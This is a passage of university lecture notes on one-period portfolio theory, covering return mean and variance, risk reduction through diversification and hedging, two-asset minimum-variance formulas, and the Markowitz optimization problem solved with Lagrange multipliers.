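On 64-bit Windows, running the same code from a 32-bit and a 64-bit process over C:\Windows\System32\calc.exe can yield different digests — which is exactly the effect diagnosed in the answer that follows.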
Got it. The Windows file system is behaving differently depending on the architecture of your process. This article explains it all - in particular, how 32-bit and 64-bit processes see different contents under the Windows system directory.
Try copying calc.exe to somewhere else... then run the same tools again. You'll get the same results as Java. Something about the Windows file system is giving different data to the tools than it's giving to Java... I'm sure it's something to do with it being in the Windows directory, and thus probably handled "differently".
Furthermore, I've reproduced it in C#... and found out that it depends on the architecture of the process you're running. So here's a sample program:
using System;
using System.IO;
using System.Security.Cryptography;

class Test
{
    static void Main()
    {
        using (var md5 = MD5.Create())
        {
            string path = "c:/Windows/System32/Calc.exe";
            var bytes = md5.ComputeHash(File.ReadAllBytes(path));
            Console.WriteLine(BitConverter.ToString(bytes));
        }
    }
}
And here's a console session (minus chatter from the compiler):
c:\users\jon\Test>csc /platform:x86 Test.cs

c:\users\jon\Test>test
60-B7-C0-FE-AD-45-F2-06-6E-5B-80-5A-91-F4-F0-FC

c:\users\jon\Test>csc /platform:x64 Test.cs

c:\users\jon\Test>test
10-E4-A1-D2-13-2C-CB-5C-67-59-F0-38-CD-B6-F3-C9

...
Liferay DXP was developed for easy customization, meaning you can modify or extend the components you want to customize.
This tutorial demonstrates finding an extension point. It steps through a simple example that locates an extension point for importing LDAP users. The example includes using Liferay DXP’s Application Manager and Felix Gogo Shell.
Locate the Related Module and Component
First think of words that describe the application behavior you want to change. The right keywords can help you easily track down the desired module and its component. Consider the example for importing LDAP users. Some candidate keywords for finding the component are import, user, and LDAP.
The easiest way to discover the module responsible for a particular Liferay feature is the Liferay Foundation app suite's list of apps and features: select the app suite the feature belongs to. This tutorial assumes you're using the Gogo shell. Once you've located the component, examine the services it references; they are candidate extension points for customizing the LDAP user import process! You can learn how to implement the customization in the tutorial here.
Important: Not all Liferay extension points are available as referenced services. Service references are common in Declarative Services (DS) components, but extension points can be exposed in other ways too. Here's a brief list of other potential extension points in Liferay DXP:
In the App Manager, you used keywords to find the module component whose behavior you wanted to change. Then you used the Gogo shell to find the component extension point for implementing your customization.
#!/usr/bin/perl -w
use strict; my $me;
my $bonnie = "lies_over_the_ocean"; {
my $bonnie = "lies_over_the_sea"; {
my $bonnie = "lies_over_the_ocean"; {
0; bring_back(my $bonnie = 2, $me); {
bring_back(
bring_back(
0, bring_back(my $bonnie = 2, $me, 2, $me )));{
bring_back(
bring_back(
0, bring_back(my $bonnie = 2, $me )))}}}}}
sub bring_back {
print "brought back my bonnie!\n" if @_ == 5;
return ("",@_);
}
One suggestion; if you turn on warnings with -w instead of use warnings, your poem will run under 5.005 too. :)
I'm curious... Could you share your thought process as you wrote this?
I've looked at Writing highly obfuscated code in Perl, but most of the tips* found in that node are not demonstrated in this snippet. Some obfuscations demonstrate a certain level of style and creativity; yours is one example.
* I would say most of those tips, used alone and without creativity, would in fact be nothing more than cheap tricks. Not unlike playing a musical instrument well technically, but without making any music.
I started with the mere idea that I wanted to write "My Bonnie Lies Over the Ocean" as a perl poem, and just tried my hardest to force the poem to be syntactically valid. I will admit that it turned out better than I expected. Here's a collection of thoughts that might help to explain how it got into its final form.
I started with:
my $bonnie = "lies_over_the_ocean";
my $bonnie = "lies_over_the_sea";
my $bonnie = "lies_over_the_ocean";
The 0; before the first bring_back() is simply a no-op. It's there because the actual song contains the word "oh" at that point.
I noticed that the words "bring back" are used repeatedly throughout the song, and made an analogy between lyrics and code. As a rule, oft-used pieces of code should be stuck within a function. Hence, I created a bring_back() function and called it repeatedly.
It just "worked out" to have nested calls to bring_back(), since that fits the flow of the actual song. The calls to bring_back() have the added advantage of setting up new scopes such that I can declare $bonnie again.
The 0,'s within the function calls continue the tradition set up earlier; they use the number 0 to represent the phonetic "oh"'s that are present in the real song, while keeping the code syntactically valid.
I called each bring_back() with whatever arguments fit the song.
At this point, I created an empty sub bring_back {} that did nothing, and thought my work was done.
I then decided it would be nice for the poem to actually output something, and decided that bring_back() should be the place to do it.
The obvious problem was getting the output to print only once, since bring_back() gets called 7 times.
I decided I'd use the number of arguments passed to bring_back() as the criteria for printing, and simply toyed with bring_back()'s return value until I got a unique number of arguments passed (5) on the last | http://www.perlmonks.org/index.pl?node=my%20%24bonnie | CC-MAIN-2015-35 | refinedweb | 492 | 67.38 |
07-13-2012 03:01 PM
I'm following the instructions on this page to set up my environment:
I'm also using my saved signing keys but whenever I try to load an app on my device or go into the Bar Signer option I get the following error:
"Error loading certificate: java.io.IOException: subject key, java.security.InvalidKeyException: Invalid EC key"
The software can't create a debug token either, seems to happen whenever the program tries to create a Debug Token, I've cleared the debug token off of my devices as well.
07-20-2012 07:52 PM
I have the same problem with a certificate created by the same tool in January 2012. I can create a new certificate without a problem, but get the "Invalid EC key" message with the old one.
08-30-2012 07:15 AM
I have the same issue. When trying to deploy an Android app to PlayBook I get prompted to create a new debug token, when I click OK I get the following error:
Error loading certificate: java.io.IOException: subject key,
java.security.InvalidKeyException: Invalid EC Key
Reason:
Error loading certificate: java.io.IOException: subject key,
java.security.InvalidKeyException: Invalid EC Key
Anyone got a workaround?
08-30-2012 09:08 AM
I found that if you use the Momentics IDE then it works fine, but I imagine for most Android developers they won't have this installed so I have a solution which involves creating a debug token from the command line.
1. First find where your developer certificate and keys are located, this is usually:
C:\Users\<username>\AppData\Local\Research In Motion
You should have the following files in there:
author.p12
barsigner.csk
2. Open a command prompt and cd to your BlackBerry tools/bin directory. You can find this by right clicking on your project in Eclipse and going to BlackBerry Tools->Configure targets, then clicking on BlackBery Tools SDK. On my machine it is:
C:\eclipse\plugins\net.rim.ajde_1.2.0.201207131336
3. Run the following command:
blackberry-debugtokenrequest -cskpass <CSKpassword> -keystore <Your P12 Developer Certificate> -storepass <Certificate Password> -deviceId <Your Blackberry Playbook Device ID in hex format (eg 0x29D91835)> <Output Debug BAR file name, example.bar>
This should create you a debug token
4. Now go back into eclipse BlackBerry Tools -> Configure targets. Click on Debug Token Details->Import, specify your newly created debug token.
That's it, your debug token should be installed on the device.
09-24-2012 07:06 AM
Hi!
I am trying to set the volume of BB Playbook in android through audio manager using SeekBar but the volume of device is not changing. however if i try to get the current volume of system (BB Palybook) it shows me the correct volume but when i try to set the volume through seekBar it did not works. here is my code :
import android.media.AudioManager;
this is the import for audioManager
AudioManager audioManager;
this is the audioManager variable

public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) {
    // TODO Auto-generated method stub
    audioManager.setStreamVolume(AudioManager.STREAM_MUSIC, progress, 0);
}
});
Please if anyone have solution to this problem. what i think that this happens due to BB security restrictions. Is that so??
09-24-2012 02:56 PM
The instructions are not working for me on step 3 blackberry-debugtokenrequest. I really spent about a hour trying to make this work!
1. I get an Error: No devices specified
It's not clear where you get the Device ID. In the PlayBook About dialog the "BlackBerry ID" is my email address (not Hex). This generates an error. Next I tried to use the Hardware Device PIN (8 hex digits). I’ve tried this 8 digit hex number both with and without “0x” prefix. I’ve also included the full path and filename author.p12 in quotes (since there are spaces in the directories.
How to you find the Hex device ID? A Google search didn't turn up anything useful. If this is the Hardwrare Device PIN, any other ideas what may be going wrong? I've reviewed the line very carefully for the correct spaces, etc.
2. Any hope this bug (java.io.IOException) will be fixed so you don't have to go through all this manual work? The Eclipse BlackBerry Deployment Setup Wizard used to do all this work for us, but it no longer works.
09-24-2012 06:16 PM
Ok, I solved this. A copy of the commands I first put in Word (to keep track of what I was doing) changed a dash to an em-dash! It was not at all obvious!
Also the Device ID is found in the PlayBook at Settings, About. Switch the top option from "General" to "Hardware". The first line "PIN" is the device id in hex.
If you're having problems, here's a clearer example of how it should look (with the passwords set to "myPassword" and user name changed to "MyName", and deviceid set to 1234ABCD:
blackberry-debugtokenrequest -cskpass myPassword -keystore "C:\Users\MyName\AppData\Local\Research In Motion\author.p12" -storepass myPassword2 -deviceid 0x1234ABCD debugtok.bar
02-20-2013 05:19 PM
my example
blackberry-debugtokenrequest -cskpass ******* -keystore "C:\bb10beta4\host_10_0_9_284\win32\x86\usr\bin\au
02-21-2013 01:16 PM - edited 02-21-2013 01:18 PM
I've created a batch script to create my debug tokens. Thought I'd share it:
set LOCAL_DATA_PATH="c:\Users\<your_username>\AppData\Local\Research In Motion"
Insert your own details and save this as create-debugtoken.bat in your BlackBerry tools folder, on my machine this is:
c:\eclipse\plugins\net.rim.ajde_1.5.1.201301180815
Now just run the batch file and your debugtoken will be created in your LOCAL_DATA_PATH folder.
Note you can easily get your Device PIN from within eclipse by doing Preferences->BlackBerry->BlackBerry Tools SDK->Bar Signer then under 'Debug tokens' click 'Create...' then 'Add' then 'Autodiscover'
03-02-2013 11:21 AM
I was getting the same Exception in Eclipse, but managed to resolve the problem by forcing Eclipse to run using Java 6 rather than Java 7.
In my eclipse.ini I added the line
-vm
C:\Program Files\Java\jdk1.6.0_41\bin\javaw.exe | http://supportforums.blackberry.com/t5/Android-Runtime-Development/Error-Loading-Certificate-Java-io-IOException/m-p/1918505 | CC-MAIN-2014-10 | refinedweb | 1,040 | 56.45 |
We have an application that periodically monitors JMX "Catalina:type=RequestProcessor,worker=*,name=*" and looks at each entry returned from that wildcard, getting requestProcessingTime. e.g., code with lines like this:
ObjectName requestProcessorWildcard = new ObjectName("Catalina:type=RequestProcessor,worker=*,name=*");
Set<ObjectName> mbeans = mbs.queryNames(requestProcessorWildcard, null);
for (ObjectName name : mbeans) {
// Get "processing time" for the current request, if any
long currentReqProcTime = getLongValue(mbs, name, "requestProcessingTime") / 60000;
We sometimes see requestProcessingTime returning a value suggesting the request started on 1-1-1970, currently 46+ years ago. Looking at Tomcat 7.0.57 source code (as what I have available to look at), I see this method in java/org/apache/coyote/RequestInfo.java:
public long getRequestProcessingTime() {
if ( getStage() == org.apache.coyote.Constants.STAGE_ENDED ) return 0;
else return (System.currentTimeMillis() - req.getStartTime());
}
Clearly, if req.getStartTime() == 0, this method will return a nonsensical request processing time. This method ought to make sure the start time isn't zero before doing the subtraction. When we see this, the request processor reports itself to be in stage 3 ... aka "STAGE_SERVICE". Clearly the requests weren't started in 1970. We don't know how the request is in the stage "service" but has its start time zeroed.
Note that the person in this thread was probably experiencing the same flaw. If you do the math 1466499689496 msec corresponds to the time span from 1-1-70 to Tue, 21 Jun 2016 09:01:29.496 GMT ... and the EMail was posted on 21 June 2016! I haven't followed the code through to see what can cause this to occur.
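The arithmetic is easy to double-check: when req.getStartTime() is 0, the reported processing time degenerates to System.currentTimeMillis() - 0, i.e. the current epoch timestamp in milliseconds:

```python
# If getStartTime() returns 0, requestProcessingTime is just the current
# epoch timestamp in milliseconds. Checking the value from the thread:
from datetime import datetime, timezone

millis = 1466499689496
dt = datetime.fromtimestamp(millis // 1000, tz=timezone.utc)
print(dt, "+", millis % 1000, "ms")  # 2016-06-21 09:01:29+00:00 + 496 ms
```

That lands on the day the mail was posted, as noted above.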
I can see a few ways this can happen. I'll look at making that code more robust.
This has been fixed in the following branches:
- 9.0.x for 9.0.0.M11 onwards
- 8.5.x for 8.5.6 onwards
- 8.0.x for 8.0.38 onwards
- 7.0.x for 7.0.73 onwards
- 6.0.x for 6.0.46 onwards | https://bz.apache.org/bugzilla/show_bug.cgi?id=60123 | CC-MAIN-2017-39 | refinedweb | 333 | 53.47 |
Hi,
I have a question regarding the warning that I get when I compile a program using boost::ublas library. I have to say that I'm not really experienced programmer so I might be doing something really stupid...
Anyway, I'm using WinXP with Mingw (gcc 3.4.5) and boost 1.34-1.
I want to create a simple function that returns a vector. I have it written like this:
===> Definition (file.h)
Code:
#include <boost/numeric/ublas/vector.hpp>
typedef boost::numeric::ublas::vector<double> vec;
vec testfunc (vec &v);
===> Implementation (file.cpp)
Code:
#include "file.h"
vec testfunc (vec &v)
{
vec v1 = v/2;
return v1;
}
When I try to compile, I get the following warning:
base class `class boost::numeric::ublas::storage_array<boost::numeric::ublas::unbounded_array<double, std::allocator<double> > >' should be explicitly initialized in the copy constructor
What am I doing wrong and how can I fix this? The program works, but I'd like to get rid of the warning
Thank you very much for your answers. | http://cboard.cprogramming.com/cplusplus-programming/96013-base-class-should-explicitly-initialized-copy-constructor-printable-thread.html | CC-MAIN-2015-06 | refinedweb | 178 | 59.09 |
SUP!, well i need help, im using visual C++, and i need to write a simple program that reads 100 numbers from 1 to 100 on a txt file, calculates their average, and the standard deviation and then inputs the standard deviation and average into the original file at the bottom:? .....k i know you start off with the basic library's you'll be using and the basic setup and such,, but from there on i am completely lost8O ,........be great if someone could help me writing this out so i can understand what i should be doing..shouldn't take long since i was peeping the forum and people seem C++ savy here...
btw the file im using is called data.txt...and is in the "Temp" folder of my c drive...THIS is attempt so far ....keep in mind im mad beginner ...in essence i need help in the whole std deviation part.
THANKS!
btw this is my code so far, be great if someone could tell me if I'm OK so far, also how I could do the standard deviation, I can't find a way to do it...
Code:
#include <iostream>
#include <cmath>
#include <fstream>
#include <iomanip>
using namespace std;

int main()
{
    float sum = 0, StdDev = 0;
    int x = 0;
    ifstream inFile;
    inFile.open("data.txt");
    while ( inFile >> x )
    {
        sum += x;
    }
    inFile.close();
    ofstream outFile( "data.txt", ios::app );
    outFile.seekp( ios::end );
    outFile << sum << endl;
    outFile.close();
    return 0;
}
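For the missing numeric step: a common approach is two passes over the data — compute the mean first, then the (population) standard deviation as the square root of the average squared deviation. Here's the formula sketched in Python (the numeric logic is what matters; translating it into a second read loop in the C++ program above is straightforward):

```python
# Two-pass population standard deviation:
#   mean = sum(x) / n
#   stddev = sqrt( sum((x - mean)^2) / n )
import math

def mean_and_stddev(values):
    n = len(values)
    mean = sum(values) / n
    variance = sum((x - mean) ** 2 for x in values) / n  # population variance
    return mean, math.sqrt(variance)

m, s = mean_and_stddev(list(range(1, 101)))  # the 100 numbers 1..100
```

For 1..100 this gives a mean of 50.5 and a standard deviation of about 28.87 (divide by n - 1 instead of n if the assignment wants the sample standard deviation).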
Multithreading : Lock objects - acquire() and release()
In this chapter, we'll learn how to control access to shared resources. The control is necessary to prevent corruption of data. In other words, to guard against simultaneous access to an object, we need to use a Lock object.

Here is our example code using the Lock object. In the code, the worker() function increments a Counter instance, which manages a Lock to prevent two threads from changing its internal state at the same time.
import threading
import time
import logging
import random

logging.basicConfig(level=logging.DEBUG,
                    format='(%(threadName)-9s) %(message)s',)

class Counter(object):
    def __init__(self, start = 0):
        self.lock = threading.Lock()
        self.value = start

    def increment(self):
        logging.debug('Waiting for a lock')
        self.lock.acquire()
        try:
            logging.debug('Acquired a lock')
            self.value = self.value + 1
        finally:
            logging.debug('Released a lock')
            self.lock.release()

def worker(c):
    for i in range(2):
        r = random.random()
        logging.debug('Sleeping %0.02f', r)
        time.sleep(r)
        c.increment()
    logging.debug('Done')

if __name__ == '__main__':
    counter = Counter()
    for i in range(2):
        t = threading.Thread(target=worker, args=(counter,))
        t.start()

    logging.debug('Waiting for worker threads')
    main_thread = threading.currentThread()
    for t in threading.enumerate():
        if t is not main_thread:
            t.join()
    logging.debug('Counter: %d', counter.value)
Output:
(Thread-1 ) Sleeping 0.04
(MainThread) Waiting for worker threads
(Thread-2 ) Sleeping 0.11
(Thread-1 ) Waiting for a lock
(Thread-1 ) Acquired a lock
(Thread-1 ) Released a lock
(Thread-1 ) Sleeping 0.30
(Thread-2 ) Waiting for a lock
(Thread-2 ) Acquired a lock
(Thread-2 ) Released a lock
(Thread-2 ) Sleeping 0.27
(Thread-1 ) Waiting for a lock
(Thread-1 ) Acquired a lock
(Thread-1 ) Released a lock
(Thread-1 ) Done
(Thread-2 ) Waiting for a lock
(Thread-2 ) Acquired a lock
(Thread-2 ) Released a lock
(Thread-2 ) Done
(MainThread) Counter: 4
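The acquire()/try/finally/release() pattern in Counter.increment() is what Lock's context-manager support packages up: `with self.lock:` acquires on entry and releases on exit, even if the body raises. A minimal variant of the counter:

```python
# Same counter as above, but letting the Lock act as a context manager.
import threading

class Counter:
    def __init__(self, start=0):
        self.lock = threading.Lock()
        self.value = start

    def increment(self):
        with self.lock:  # equivalent to acquire() ... finally: release()
            self.value += 1

c = Counter()
threads = [
    threading.Thread(target=lambda: [c.increment() for _ in range(1000)])
    for _ in range(4)
]
for t in threads:
    t.start()
for t in threads:
    t.join()
```

With the lock in place, 4 threads x 1000 increments always ends at exactly 4000.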
In this example, worker() tries to acquire the lock three separate times, and counts how many attempts it has to make to do so. In the mean time, locker() cycles between holding and releasing the lock, with short sleep in each state used to simulate load.
import threading
import time
import logging

logging.basicConfig(level=logging.DEBUG,
                    format='(%(threadName)-9s) %(message)s',)

def locker(lock):
    logging.debug('Starting')
    while True:
        lock.acquire()
        try:
            logging.debug('Locking')
            time.sleep(1.0)
        finally:
            logging.debug('Not locking')
            lock.release()
        time.sleep(1.0)
    return

def worker(lock):
    logging.debug('Starting')
    num_tries = 0
    num_acquires = 0
    while num_acquires < 3:
        time.sleep(0.5)
        logging.debug('Trying to acquire')
        acquired = lock.acquire(0)
        try:
            num_tries += 1
            if acquired:
                logging.debug('Try #%d : Acquired', num_tries)
                num_acquires += 1
            else:
                logging.debug('Try #%d : Not acquired', num_tries)
        finally:
            if acquired:
                lock.release()
    logging.debug('Done after %d tries', num_tries)

if __name__ == '__main__':
    lock = threading.Lock()

    locker = threading.Thread(target=locker, args=(lock,), name='Locker')
    locker.setDaemon(True)
    locker.start()

    worker = threading.Thread(target=worker, args=(lock,), name='Worker')
    worker.start()
Output:
(Locker   ) Starting
(Locker   ) Locking
(Worker   ) Starting
(Worker   ) Trying to acquire
(Worker   ) Try #1 : Not acquired
(Locker   ) Not locking
(Worker   ) Trying to acquire
(Worker   ) Try #2 : Acquired
(Worker   ) Trying to acquire
(Worker   ) Try #3 : Acquired
(Locker   ) Locking
(Worker   ) Trying to acquire
(Worker   ) Try #4 : Not acquired
(Worker   ) Trying to acquire
(Worker   ) Try #5 : Not acquired
(Locker   ) Not locking
(Worker   ) Trying to acquire
(Worker   ) Try #6 : Acquired
(Worker   ) Done after 6 tries
...
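The key call in worker() is lock.acquire(0): passing a falsy blocking argument makes acquire return immediately with True or False instead of waiting for the holder. Stripped down to its essence:

```python
# Non-blocking acquire: returns immediately with True/False instead of
# waiting for the current holder to release the lock.
import threading

lock = threading.Lock()
lock.acquire()                    # hold the lock

got_it = lock.acquire(False)      # non-blocking try while it is held -> False
lock.release()                    # free the lock

got_it_now = lock.acquire(False)  # try again once it is free -> True
lock.release()
```

On Python 3.2+ you can also bound the wait instead, e.g. lock.acquire(timeout=0.5).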
Visit my website at:
Recently I was testing a BizTalk map inside Visual Studios. The input schema was auto generated using the SQL Adapter and the output was a simple text file. I was using a sample file provided to me from a past generation from the schema (or so I thought) to test the map.
When I was testing, I keep getting a blank file as output and a strange error. The error was: Native serialization error: Root element is missing.
I had both input and output validation turned on and the input sample file was passing validation. To confirm this, I took the schema and sample file and confirmed it validated using Visual Studios.
Since I was not having much luck testing inside Visual Studios, I decided to set up a send & receive port and test the map through BizTalk to see if I could get different result. This time, I got a subscription not found error.
Odd, since the schema and maps are all deployed. I checked the message that was suspended and noticed it was not mapped; my original message was published and suspended.
This could only mean the message type was wrong - somehow. So I took a closer look at the namespace in the sample message. It was slightly off! I corrected the namespace in the sample file and everything worked fine.
Overall, the moral of the story is three fold:
1. Schema Validation inside BizTalk DOES NOT validate namespace; at least it doesn’t if there is only one.
2. When you get a strange mapping error with no output, check your namespace!
3. Use extreme caution when typing in the namespace fields when using the SQL Adapter. Evidently in a past test the namespace was typed incorrectly. When the SQL Schema was auto generated, this wrong schema was used to make the sample file I was using.
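Since BizTalk's message type is essentially "namespace#rootElementName", a tiny script that extracts both from a sample file is a fast way to catch a namespace typo before a test run. An illustrative sketch (not a BizTalk API; the namespace below is made up):

```python
# Extract "namespace#rootElement" from a sample message to eyeball the
# message type. Namespace URI here is invented for illustration.
import xml.etree.ElementTree as ET

def message_type(xml_text):
    root = ET.fromstring(xml_text)
    if root.tag.startswith("{"):          # ElementTree stores "{ns}local"
        ns, local = root.tag[1:].split("}", 1)
    else:
        ns, local = "", root.tag
    return "%s#%s" % (ns, local)

sample = '<Customers xmlns="http://schemas.example.com/sql/import"/>'
mt = message_type(sample)  # http://schemas.example.com/sql/import#Customers
```

Comparing this string against the deployed schema's target namespace makes an off-by-one-character namespace obvious.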
This took me over an hour to figure out so I guess I’m getting rusty at testing BizTalk maps. Hope this helps someone else out down the road. | http://geekswithblogs.net/sthomas/archive/2006/08/15/88094.aspx | CC-MAIN-2017-39 | refinedweb | 343 | 73.37 |
I experimented with Dapper and Dapper.Contrib. I have the following class:
public class Customer { public int Id { get; set; } public string FirstName { get; set; } public string LastName { get; set; } public DateTime DateOfBirth { get; set; } public bool Active { get; set; } }
It is being mapped to the table "Customers", which is pluralized. Is there a simple way to make Dapper use singular table names for all tables?
Dapper.Contrib supports the Table attribute. Use it to manually specify the name of the table that an entity uses. See the docs for further information.

Alternatively there is a static delegate on SqlMapperExtensions called TableNameMapper. You can replace this with an implementation that performs the pluralization. PluralizationService in the framework can help you here.
It is used as follows:
SqlMapperExtensions.TableNameMapper = (type) =>
{
    // do something here to pluralize the name of the type
    return type.Name;
};
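The body of that delegate is where the singular/plural mapping goes. As a sketch of the kind of naive name mapping you might start with (illustrative only; a real PluralizationService handles far more cases than a few suffix rules):

```python
# Naive singularizer of the kind you might plug into TableNameMapper.
# Sketch only: real pluralization services handle many more cases.
def singularize(name):
    if name.endswith("ies"):
        return name[:-3] + "y"    # Categories -> Category
    if name.endswith("ses"):
        return name[:-2]          # Addresses -> Address
    if name.endswith("s") and not name.endswith("ss"):
        return name[:-1]          # Customers -> Customer
    return name
```

With a mapper built on this idea, the Customer entity resolves to the singular table name "Customer" instead of "Customers".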
Question
What is the difference between import Swift and import Foundation?

Until I read this comment by Martin R, I didn't even know that there was an import Swift.
Reading
I couldn’t find the documentation and doing a Google search didn’t turn up much.
What I tried
Testing it out shows that import Swift does not give any compile errors, but that doesn't really answer my question.

If I were to guess, I would say that you import Swift for Swift projects and that you import Foundation for Objective-C projects or maybe for Swift projects that use Objective-C classes (like NSString).
Testing this in the Playground:
import Foundation
import Swift
var str = "Hello, playground"
let str2: NSString = "hello"
let str3: String = "hello"
Commenting out import Swift gives no errors and str is of String type. However, commenting out import Foundation gives an "undeclared type" error for NSString.
My question revisited
I would be happy enough to abandon Foundation and just use Swift. So am I right to just import Swift all the time unless I specifically need to use one of the old Objective-C classes?
Yes, you will only need import Foundation if you want to access NSObject or one of its subclasses. Foundation is the framework that brings in that class hierarchy. However, it's highly likely that in a project you'll need more than just import Swift. Like Rob commented, import UIKit is also a nice option.
In case you haven’t read it already, Apple explains the Foundation framework here. | https://coded3.com/import-swift-vs-import-foundation/ | CC-MAIN-2022-40 | refinedweb | 261 | 70.23 |
Working with Flags
Let me start by demonstrating how you should work with flags in your code. First, flags shall be easy to combine using the or (|) operator:
Chip::setMode(Mode::Enabled|Mode::Speed100kHz|Mode::Alternative);
In your implementation, you should be able to test for flags and convert combined flags into a bit mask.
void setMode(Modes modes) {
    if (modes.isSet(Mode::Enabled)) {
        // ...
    }
    MODE_REG = modes;
}
The last requirement is to make everything type safe. This means a flag from enumeration A, for example, cannot be used for the flags in B. This will prevent many typos and errors in your code.
Chip::setMode(Pin::Enabled); // ERROR!
Implementation
The implementation of this behaviour is very simple. First we need a simple template class to create a new type for the flags:
Used Language Features
This code is using many language features from C++11. Therefore you have to make sure the compiler in your build chain supports this language version. This is already the case for the Arduino IDE any many other GCC based environments. Sometimes you have to add the
-std=C++11 or even better
-std=C++17 command line option to enable the latest language features.
Basic Required Features
- The
header: This header from the standard library defines the types
uint8_tor
int32_tto declare variables of a defined size. The header should exist in every C++ environment. If your development environment does not support this header, you should switch to another one.
- Template class: Template classes working like regular classes, but certain parameters are defined at the point of use. Usually this parameters define types which are used for the class. The compiler will automatically generate a new class definition using this parameter at the point a template class is first used in the code. Template classes are an important feature of the C++ language and should be present in every development environment.
- The
inlinespecifier: This specifier is a simple hint to the compiler to use the code of a function directly, replacing the call. This is just a hint.
- Namespaces: Especially for embedded code, namespaces are a really great tool to keep your own types and variables in a own scope. They are also a nice tool to create logical modules without using singleton classes.
Features from C++11
- Type Traits: The
header defines a number of template classes which can be used in combination with
static_assert, to check the type of parameters. It can also be used in template to conclude a type from a parameter.
- The
noexceptspecifier: It declares a function will never throw an exception. Exception are usually not used in embedded code, but this class can be universally used in desktop and embedded code. Marking functions not throwing exceptions will allow the compiler to generate better optimisations.
- The
constexprspecifier: It declares a function with a given input will always generate the same output. This will allow the compiler to evaluate a function at compile time. Marking the right methods with the specifier will not only reduce the size of the generated binary, it will also allow to use flag combinations as constants.
- The initialiser list feature: Using the
header allows creating a constructor using an initialiser list. This will allow to initialize flags with syntax like this:
const Flags flags = {Flag::A, Flag::B, Flag::C};
Simple Usage Example
See the following code of a driver for the TCA9548A chip as a very simple example. I removed all comments and some methods to demonstrate the usage.
This simple I2C multiplexer chip allows enabling any combination of the eight supported channels. Using the flags class, the usage of this interface is simple and safe. You easily enable one or more channels.
Working with the flags in the implementation is very simple.
As you can see, you can work with the channels very similar as you would with any other bit mask. The difference is the type safety. It is not possible to accidentally mix bits from one flags type with another.
In line 38, you can also see how the flags type is implicitly converted into a bit mask. This is a one way operation. The flags can be converted into a bit mask, but an “anonymous” bit mask can not be converted automatically into a flags type.
Advanced Usage
You can not only use simple flags, where each bit is assigned to one enumeration value. Any combination of bits and masks is possible.
Conclusion
The flags template class will allow you to work with flags in a safe and comfortable way. The compiler will detect any potential problems where you use the wrong enumeration type for the flags.
If you have questions, miss some information or just have any feedback, feel free to add a comment below.
Have fun! | https://luckyresistor.me/2018/05/06/make-your-code-safe-and-readable-with-flags/?shared=email&msg=fail | CC-MAIN-2019-30 | refinedweb | 797 | 55.44 |
I also faced the same problem, but don’t remember the exact reason for this. Look for it on keras github issues.
Try this:
for layer in fc_model.layers: layer.called_with = None conv_model.add(layer)
I also faced the same problem, but don’t remember the exact reason for this. Look for it on keras github issues.
Try this:
for layer in fc_model.layers: layer.called_with = None conv_model.add(layer)
Thank you @Manoj , it worked ! Although I don’t know why it raised this error , but it works, thanks again.
Hi, Jeremy,
In the lesson 3 notes, as to “filters”, there is a sentence “Then we would imagine that the brightest pixels in this new image are ones in a 3x3 area where the row above it s all 0 (black), and the center row is all 1 (white)”. How to understand it? I can’t catch what it means.
Thanks
Liu Peng
Hello everyone!
I’m having memory issues on lesson 3. The execution of the code runs fine until here:
conv_model.fit_generator(batches, samples_per_epoch=batches.nb_sample, nb_epoch=8,
validation_data=val_batches, nb_val_samples=val_batches.nb_sample)
After doing some stuff, I executed that line, getting a memory error after a couple of seconds. I tried re-executing all the code from scratch after a fresh reboot, and the program started fitting, but on the fourth epoch or so, I got the memory error again, which is the following:
MemoryError Traceback (most recent call last)
in ()
1 conv_model.fit_generator(batches, samples_per_epoch=batches.nb_sample, nb_epoch=8,
----> 2 validation_data=val_batches, nb_val_samples=val_batches.nb_sample)
/home/user/anaconda2/lib/python2.7/site-packages/keras/models.pyc in fit_generator(self, generator, samples_per_epoch, nb_epoch, verbose, callbacks, validation_data, nb_val_samples, class_weight, max_q_size, nb_worker, pickle_safe, initial_epoch, **kwargs)
933 nb_worker=nb_worker,
934 pickle_safe=pickle_safe,
–> 935 initial_epoch=initial_epoch)
936
937 def evaluate_generator(self, generator, val_samples,
/home/user/anaconda2/lib/python2.7/site-packages/keras/engine/training.pyc in fit_generator(self, generator, samples_per_epoch, nb_epoch, verbose, callbacks, validation_data, nb_val_samples, class_weight, max_q_size, nb_worker, pickle_safe, initial_epoch)
1555 outs = self.train_on_batch(x, y,
1556 sample_weight=sample_weight,
-> 1557 class_weight=class_weight)
1558
1559 if not isinstance(outs, list):
/home/user/anaconda2/lib/python2.7/site-packages/keras/engine/training.pyc in train_on_batch(self, x, y, sample_weight, class_weight)
1318 ins = x + y + sample_weights
1319 self._make_train_function()
-> 1320 outputs = self.train_function(ins)
1321 if len(outputs) == 1:
1322 return outputs[0]
/home/user/anaconda2/lib/python2.7/site-packages/keras/backend/theano_backend.pyc in call(self, inputs)
957 def call(self, inputs):
958 assert isinstance(inputs, (list, tuple))
–> 959 return self.function(*inputs)
960
961
/home/user/anaconda2/lib/python2.7/site-packages/theano/compile/function_module.pyc in call(self, *args, **kwargs)
896 node=self.fn.nodes[self.fn.position_of_error],
897 thunk=thunk,
–> 898 storage_map=getattr(self.fn, ‘storage_map’, None))
899 else:
900 # old-style linkers raise their own exceptions
/home/user/anaconda2/lib/python2.7/site-packages/theano/gof/link.pyc in raise_with_op(node, thunk, exc_info, storage_map)
323 # extra long error message in that case.
324 pass
–> 325 reraise(exc_type, exc_value, exc_trace)
326
327
/home/user/anaconda2/lib/python2.7/site-packages/theano/compile/function_module.pyc in call(self, *args, **kwargs)
882 try:
883 outputs =
–> 884 self.fn() if output_subset is None else
885 self.fn(output_subset=output_subset)
886 except Exception:
MemoryError: Error allocating 411041792 bytes of device memory (out of memory).
Apply node that caused the error: GpuAllocEmpty(Assert{msg=‘The convolution would produce an invalid shape (dim[0] < 0).’}.0, Assert{msg=‘The convolution would produce an invalid shape (dim[1] < 0).’}.0, Assert{msg=‘The convolution would produce an invalid shape (dim[2] <= 0).’}.0, Assert{msg=‘The convolution would produce an invalid shape (dim[3] <= 0).’}.0)
Toposort index: 211
Inputs types: [TensorType(int64, scalar), TensorType(int64, scalar), TensorType(int64, scalar), TensorType(int64, scalar)]
Inputs shapes: [(), (), (), ()]
Inputs strides: [(), (), (), ()]
Inputs values: [array(32), array(64), array(224), array(224)]
